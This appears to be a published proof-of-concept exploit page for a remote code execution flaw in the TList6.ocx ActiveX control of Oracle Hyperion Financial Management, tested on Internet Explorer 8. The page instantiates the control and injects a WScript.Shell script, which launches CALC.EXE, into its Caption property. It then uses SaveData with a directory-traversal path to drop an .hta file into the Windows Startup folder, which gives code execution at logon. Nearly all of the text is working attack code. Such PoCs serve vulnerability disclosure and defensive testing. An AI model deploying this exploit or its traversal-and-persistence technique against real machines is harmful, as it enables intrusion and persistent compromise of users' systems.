<!--
Oracle Hyperion Financial Management 11.1.2.1.0
TList6.ocx ActiveX Control Remote Code Execution Vulnerability PoC

tested against Internet Explorer 8
Microsoft Windows 2003 r2 sp2

Binary Path: C:\WINDOWS\system32\TList6.ocx
ProgID: TList.TList.6
CLSID: {65996200-3B87-11D4-A21F-00E029189826}
Safe for Initialization (Registry): True
Safe for Scripting (Registry): True

rgod
-->
<!-- saved from url=(0014)about:internet --> 
<html>
<object classid='clsid:65996200-3B87-11D4-A21F-00E029189826' id='obj' />
</object>
<script>
obj.Caption = ">>>>>>>>>>>>>>>>><" + "SCRIPT> var x=new ActiveXObject(\"WScript.Shell\"); x.Exec(\"CALC.EXE\"); <" +"/SCRIPT>";
obj.SaveData("..\\..\\..\\..\\..\\..\\..\\..\\..\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\suntzu.hta");
</script>